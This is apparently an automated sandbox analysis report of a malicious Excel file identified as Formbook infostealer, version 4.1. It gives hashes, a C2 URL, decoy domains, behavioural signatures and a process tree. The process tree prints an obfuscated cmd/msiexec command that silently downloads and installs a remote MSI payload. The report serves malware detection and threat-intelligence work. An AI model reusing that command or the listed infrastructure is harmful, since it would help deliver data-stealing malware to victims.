Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 17:04

General

  • Target

    18a6d23e_by_Libranalysis.xls

  • Size

    37KB

  • MD5

    18a6d23e499cec73758a943dc9392821

  • SHA1

    583fdda8b474d1ef4d16e250b4d901014377e988

  • SHA256

    fc6028f1731d7c612c6a4b848df098cfaa7d3caac1a098c526d9eb24d46bd6c2

  • SHA512

    7e08d609fbc8eb9c0e364bae2bfde135a864b9c3bfb779aff77724d5b79b50f441d8843ff29413de7b0e676aa19b156997405792d13321ad48de5dd9eda9fb62

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.craftsman-vail.com/cca/

Decoy

whenpigsflyhigh.com

artistiklounge.com

tinytrendstique.com

projektpartner-ag.com

charvelevh.com

easycompliances.net

zengheqiye.com

professionalmallorca.com

bonzerstudio.com

nelivo.com

yangxeric.com

aredntech.com

twincitieshousingmarket.com

allshadesunscreen.com

xiang-life.net

qmcp00011.com

lindsayeandmarkv.com

fbcsbvsbvsjbvjs.com

saveonthrivelife.com

newdpo.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\18a6d23e_by_Libranalysis.xls"
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:796
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/tgh66091.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\system32\msiexec.exe
          mSiExec /i http://farm-finn.com/admin/tgh66091.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:1320
    • C:\Windows\SysWOW64\wlanext.exe
      "C:\Windows\SysWOW64\wlanext.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:996
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Installer\MSIFFF4.tmp"
        3⤵
          PID:1176
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:504
      • C:\Windows\Installer\MSIFFF4.tmp
        "C:\Windows\Installer\MSIFFF4.tmp"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:3476
        • C:\Windows\Installer\MSIFFF4.tmp
          "C:\Windows\Installer\MSIFFF4.tmp"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:3864

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    4
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
      MD5

      4fcb2a3ee025e4a10d21e1b154873fe2

      SHA1

      57658e2fa594b7d0b99d02e041d0f3418e58856b

      SHA256

      90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

      SHA512

      4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

    • C:\Windows\Installer\MSIFFF4.tmp
      MD5

      32b4cdd8df63b6e2fd06d9c3f70983e2

      SHA1

      56a0cb8f39d7740fa2eb4a3803b20235a9750eb4

      SHA256

      5432639b7cf4aff9b0511e5afa6ef16e5eff79cd7236562c15ea681973569f61

      SHA512

      b89c80661d1240df84a71c2c4bff66e86d41bcc61c9cc1263c0be2dbb64fbc0f7907468faf4098f7ae3eb8f6386aaab2a568747549431cbc7987eb95ba696bde

    • C:\Windows\Installer\MSIFFF4.tmp
      MD5

      32b4cdd8df63b6e2fd06d9c3f70983e2

      SHA1

      56a0cb8f39d7740fa2eb4a3803b20235a9750eb4

      SHA256

      5432639b7cf4aff9b0511e5afa6ef16e5eff79cd7236562c15ea681973569f61

      SHA512

      b89c80661d1240df84a71c2c4bff66e86d41bcc61c9cc1263c0be2dbb64fbc0f7907468faf4098f7ae3eb8f6386aaab2a568747549431cbc7987eb95ba696bde

    • C:\Windows\Installer\MSIFFF4.tmp
      MD5

      32b4cdd8df63b6e2fd06d9c3f70983e2

      SHA1

      56a0cb8f39d7740fa2eb4a3803b20235a9750eb4

      SHA256

      5432639b7cf4aff9b0511e5afa6ef16e5eff79cd7236562c15ea681973569f61

      SHA512

      b89c80661d1240df84a71c2c4bff66e86d41bcc61c9cc1263c0be2dbb64fbc0f7907468faf4098f7ae3eb8f6386aaab2a568747549431cbc7987eb95ba696bde

    • \Users\Admin\AppData\Local\Temp\nsa699.tmp\juw9gxx34fgqj.dll
      MD5

      c0903517afa29eb5aa5ce627b447f031

      SHA1

      b337659ad551e409836e5d51e161ae5b46269378

      SHA256

      4bd83d6b82767ff08aaade6bee60bdb5717b1462dac53997adf2ae831ae0f462

      SHA512

      5e086cbac7010f6a88ac7c2dfcd8dce6dcf1e459434fac1536424921660a7bb8390a14103821e6db007c3846907fb7dc904312fc25b1519e40215a754903656d

    • memory/796-122-0x00007FFACD260000-0x00007FFACE34E000-memory.dmp
      Filesize

      16.9MB

    • memory/796-121-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp
      Filesize

      64KB

    • memory/796-123-0x00007FFACB360000-0x00007FFACD255000-memory.dmp
      Filesize

      31.0MB

    • memory/796-118-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp
      Filesize

      64KB

    • memory/796-114-0x00007FF7099D0000-0x00007FF70CF86000-memory.dmp
      Filesize

      53.7MB

    • memory/796-117-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp
      Filesize

      64KB

    • memory/796-116-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp
      Filesize

      64KB

    • memory/796-115-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp
      Filesize

      64KB

    • memory/996-192-0x0000000000000000-mapping.dmp
    • memory/996-198-0x0000000003590000-0x0000000003623000-memory.dmp
      Filesize

      588KB

    • memory/996-196-0x0000000003690000-0x00000000039B0000-memory.dmp
      Filesize

      3.1MB

    • memory/996-194-0x0000000001080000-0x0000000001097000-memory.dmp
      Filesize

      92KB

    • memory/996-195-0x0000000001020000-0x000000000104E000-memory.dmp
      Filesize

      184KB

    • memory/1176-193-0x0000000000000000-mapping.dmp
    • memory/1320-180-0x0000000000000000-mapping.dmp
    • memory/3024-199-0x0000000002610000-0x00000000026B9000-memory.dmp
      Filesize

      676KB

    • memory/3024-191-0x0000000008BA0000-0x0000000008D26000-memory.dmp
      Filesize

      1.5MB

    • memory/3476-187-0x0000000000AC0000-0x0000000000AE3000-memory.dmp
      Filesize

      140KB

    • memory/3476-181-0x0000000000000000-mapping.dmp
    • memory/3864-189-0x00000000009E0000-0x0000000000D00000-memory.dmp
      Filesize

      3.1MB

    • memory/3864-190-0x00000000006E0000-0x00000000006F4000-memory.dmp
      Filesize

      80KB

    • memory/3864-185-0x000000000041EB70-mapping.dmp
    • memory/3864-188-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

    • memory/4052-179-0x0000000000000000-mapping.dmp